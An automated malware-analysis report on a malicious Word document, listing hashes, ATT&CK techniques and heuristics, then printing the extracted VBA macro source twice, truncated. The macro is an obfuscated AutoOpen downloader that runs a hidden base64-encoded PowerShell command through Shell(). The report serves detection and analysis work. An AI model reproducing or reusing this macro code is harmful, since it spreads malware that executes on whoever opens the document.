Office (OLE) malware analysis — malicious · 42ff820cd1217438

MALICIOUS

Office (OLE)

109.8 KB Created: 2018-05-31 15:22:00 Authoring application: Microsoft Office Word First seen: 2018-06-19

MD5: dab6a0c02b7f7daadb6d7f41e7da6d4e SHA-1: 6b451ddb34c5b097a40422c3a1d434f569175657 SHA-256: 42ff820cd12174384cd62cbff64aa44465b479700c1e12fe078adffdcfc10432

182 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The sample is a malicious Office document containing VBA macros. The Autoopen subroutine triggers a function that utilizes the Shell() function to execute a command. This command appears to be a base64 encoded PowerShell command, likely intended to download and execute a secondary payload. The obfuscated nature of the script and the use of Shell() indicate a downloader or droppper functionality.

Heuristics 6

VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 16976 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	16976 bytes
SHA-256: `6d1ad468a0aab3b6c7b0c872f1c87726c0d414563c56f144590d207acfa5da0e`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "SNQPNpiQwb" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Function wDhjPJDzBAE() On Error Resume Next Select Case KAlrcOiOT Case 95923 aSADc = 58573 ztHiVV = CDbl(97772) Case 45802 TzJdt = TfWvr DpUczC = 4467 End Select Select Case KAlJlwlZa Case 42725 ldYtE = 81627 OJUiX = CDbl(98245) Case 40681 jnwtDm = XSwfO DXDTjR = 89448 End Select wDhjPJDzBAE = McKzObjG + Shell(QfDHpZ + Chr(vbKeyP) + PrwXLDAl + diJDXmzY + MFqCVUoccA + WBlXRdG + qNPtJ + CiaJnU + vlTPz, VkNOwNvA + vbHide + BijcVRktBMz) Select Case KAlWwqNiF Case 36925 YitoEP = 97108 jSPfFG = CDbl(93409) Case 49365 cLlQLr = aoKpFj hmuuS = 71916 End Select End Function Sub Autoopen() On Error Resume Next Select Case KAlinZamN Case 3725 mQBRl = 4779 hMMnLN = CDbl(31160) Case 10665 Xzuis = MioBw MqYdf = 21785 End Select wDhjPJDzBAE Select Case KAltnovV Case 74480 hhiZM = 27065 PCnTTW = CDbl(52060) Case 7550 ckEXU = oKjCP VjEYv = 74925 End Select End Sub Attribute VB_Name = "izOokpwolJM" Function PrwXLDAl() On Error Resume Next Select Case KAlwmPiEK Case 87315 sOifN = 54166 qsOwcI = CDbl(35195) Case 81168 VqaIkC = jZttVD nqwriT = 13960 End Select fosUlRivHi = "owers" + "HeLL -WinDowsT" + "yle hidde" + "n -e IA" + "AoACcAVAAnAC" Select Case KAlzQaSEk Case 1553 oivbJ = 27385 kiqRzG = CDbl(38297) Case 66998 mubFd = jXhfs iSwMi = 30581 End Select jbSOdlOM = "sAJwBlAG8A" + "bgBzACcAKwA" + "nAGEAZAAnACsA" + "JwBhACcAKwAnA" + "HMAZAA" + "gAD0AIAAmAC" Select Case KAlPZcoZ Case 13467 IsBHk = 57479 DfJJuf = CDbl(46113) Case 88906 tdVYC = sFRqO zJGBw = 30178 End Select iotfRbX = "gAJwArACcAS" + "ABDAFM" + "AbgBIACcAKwAnAE" + "MAJwArAC" + "cAUwArA" + "CcAKwA" Select Case KAlrWauO Case 55024 moDnkh = 40473 iKDiL = CDbl(86281) Case 631 ptPOFV = HvPQC TiGwX = 56863 End Select KUjJi = "nAEgAQwBTA" + "CcAKwAn" + "AGUASABDAFMAKw" + "AnACsAJwBIAEMAU" + "wB3AC0Abw" + "BiACcAKw" Select Case KAlCiGhw Case 92981 wwQEOr = 50597 BzOZQk = CDbl(91793) Case 83411 RSwPb = lnPwtL hPJvHJ = 59949 End Select PkcPzbchXf = "AnAGoAZQ" + "BjAEgA" + "JwArACcAQwB" + "TACsAJwArACc" + "ASABDA" + "FMAdABIAEMAU" PrwXLDAl = fosUlRivHi + jbSOdlOM + iotfRbX + KUjJi + PkcPzbchXf End Function Function diJDXmzY() On Error Resume Next Select Case KAlBLcjh Case 12854 wMTGml = 31554 wLUAiQ = CDbl(99167) Case 89793 YNRwPV = mMIPGV tqEpCd = 74553 End Select vFZZH = "wAnACsAJwApAC" + "AAcgBhACcAKwA" + "nAG4AZA" + "BvAG0AO" + "wBUACcAKw" + "AnAGUAJw" + "ArACcAbwBZAF" + "kAJwArACcAVQAgA" Select Case KAlBRjLj Case 74015 AuBQv = 21570 oiirp = CDbl(38832) Case 51161 AZcfaK = bzRuzM PElrd = 23011 End Select USXGAsSrRDj = "D0AIAAuAC" + "gAJwArACc" + "ASABDAFMAJwArA" + "CcAbgBlA" + "EgAQwB" + "TACsASABDAFMAdw" + "AnACsAJwBIAEM" + "AUwArACcAKwAnA" + "EgAQwBTACcAKwAn" Select Case KAlNpaUa Case 3775 GKnSw = 48083 JjELw = CDbl(48805) Case 38135 zBLHo = iFwqO mkBKA = 15526 End Select zWAQIXhtwM = "AC0AbwAnACsAJw" + "BiACcAKwAnAGo" + "AZQAnACsAJwBjAH" + "QASABDACcAKwAn" Select Case KAlUmdbA Case 75452 FUhffm = 88933 pZISN = CDbl(3384) Case 54048 pcjKd = htKqT SWZLUE = 26070 End Select JXBUvSjIK = "AFMAKQAgAF" + "MAeQBzAHQAZQ ... (truncated)

SHA-256: 6d1ad468a0aab3b6c7b0c872f1c87726c0d414563c56f144590d207acfa5da0e

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "SNQPNpiQwb"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function wDhjPJDzBAE()
On Error Resume Next
Select Case KAlrcOiOT
      Case 95923
         aSADc = 58573
         ztHiVV = CDbl(97772)
      Case 45802
         TzJdt = TfWvr
         DpUczC = 4467
End Select
Select Case KAlJlwlZa
      Case 42725
         ldYtE = 81627
         OJUiX = CDbl(98245)
      Case 40681
         jnwtDm = XSwfO
         DXDTjR = 89448
End Select
wDhjPJDzBAE = McKzObjG + Shell(QfDHpZ + Chr(vbKeyP) + PrwXLDAl + diJDXmzY + MFqCVUoccA + WBlXRdG + qNPtJ + CiaJnU + vlTPz, VkNOwNvA + vbHide + BijcVRktBMz)
Select Case KAlWwqNiF
      Case 36925
         YitoEP = 97108
         jSPfFG = CDbl(93409)
      Case 49365
         cLlQLr = aoKpFj
         hmuuS = 71916
End Select
End Function
Sub Autoopen()
On Error Resume Next
Select Case KAlinZamN
      Case 3725
         mQBRl = 4779
         hMMnLN = CDbl(31160)
      Case 10665
         Xzuis = MioBw
         MqYdf = 21785
End Select
wDhjPJDzBAE
Select Case KAltnovV
      Case 74480
         hhiZM = 27065
         PCnTTW = CDbl(52060)
      Case 7550
         ckEXU = oKjCP
         VjEYv = 74925
End Select
End Sub


Attribute VB_Name = "izOokpwolJM"
Function PrwXLDAl()
On Error Resume Next
Select Case KAlwmPiEK
      Case 87315
         sOifN = 54166
         qsOwcI = CDbl(35195)
      Case 81168
         VqaIkC = jZttVD
         nqwriT = 13960
End Select
fosUlRivHi = "owers" + "HeLL -WinDowsT" + "yle hidde" + "n -e IA" + "AoACcAVAAnAC"
Select Case KAlzQaSEk
      Case 1553
         oivbJ = 27385
         kiqRzG = CDbl(38297)
      Case 66998
         mubFd = jXhfs
         iSwMi = 30581
End Select
jbSOdlOM = "sAJwBlAG8A" + "bgBzACcAKwA" + "nAGEAZAAnACsA" + "JwBhACcAKwAnA" + "HMAZAA" + "gAD0AIAAmAC"
Select Case KAlPZcoZ
      Case 13467
         IsBHk = 57479
         DfJJuf = CDbl(46113)
      Case 88906
         tdVYC = sFRqO
         zJGBw = 30178
End Select
iotfRbX = "gAJwArACcAS" + "ABDAFM" + "AbgBIACcAKwAnAE" + "MAJwArAC" + "cAUwArA" + "CcAKwA"
Select Case KAlrWauO
      Case 55024
         moDnkh = 40473
         iKDiL = CDbl(86281)
      Case 631
         ptPOFV = HvPQC
         TiGwX = 56863
End Select
KUjJi = "nAEgAQwBTA" + "CcAKwAn" + "AGUASABDAFMAKw" + "AnACsAJwBIAEMAU" + "wB3AC0Abw" + "BiACcAKw"
Select Case KAlCiGhw
      Case 92981
         wwQEOr = 50597
         BzOZQk = CDbl(91793)
      Case 83411
         RSwPb = lnPwtL
         hPJvHJ = 59949
End Select
PkcPzbchXf = "AnAGoAZQ" + "BjAEgA" + "JwArACcAQwB" + "TACsAJwArACc" + "ASABDA" + "FMAdABIAEMAU"
PrwXLDAl = fosUlRivHi + jbSOdlOM + iotfRbX + KUjJi + PkcPzbchXf
End Function
Function diJDXmzY()
On Error Resume Next
Select Case KAlBLcjh
      Case 12854
         wMTGml = 31554
         wLUAiQ = CDbl(99167)
      Case 89793
         YNRwPV = mMIPGV
         tqEpCd = 74553
End Select
vFZZH = "wAnACsAJwApAC" + "AAcgBhACcAKwA" + "nAG4AZA" + "BvAG0AO" + "wBUACcAKw" + "AnAGUAJw" + "ArACcAbwBZAF" + "kAJwArACcAVQAgA"
Select Case KAlBRjLj
      Case 74015
         AuBQv = 21570
         oiirp = CDbl(38832)
      Case 51161
         AZcfaK = bzRuzM
         PElrd = 23011
End Select
USXGAsSrRDj = "D0AIAAuAC" + "gAJwArACc" + "ASABDAFMAJwArA" + "CcAbgBlA" + "EgAQwB" + "TACsASABDAFMAdw" + "AnACsAJwBIAEM" + "AUwArACcAKwAnA" + "EgAQwBTACcAKwAn"
Select Case KAlNpaUa
      Case 3775
         GKnSw = 48083
         JjELw = CDbl(48805)
      Case 38135
         zBLHo = iFwqO
         mkBKA = 15526
End Select
zWAQIXhtwM = "AC0AbwAnACsAJw" + "BiACcAKwAnAGo" + "AZQAnACsAJwBjAH" + "QASABDACcAKwAn"
Select Case KAlUmdbA
      Case 75452
         FUhffm = 88933
         pZISN = CDbl(3384)
      Case 54048
         pcjKd = htKqT
         SWZLUE = 26070
End Select
JXBUvSjIK = "AFMAKQAgAF" + "MAeQBzAHQAZQ
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.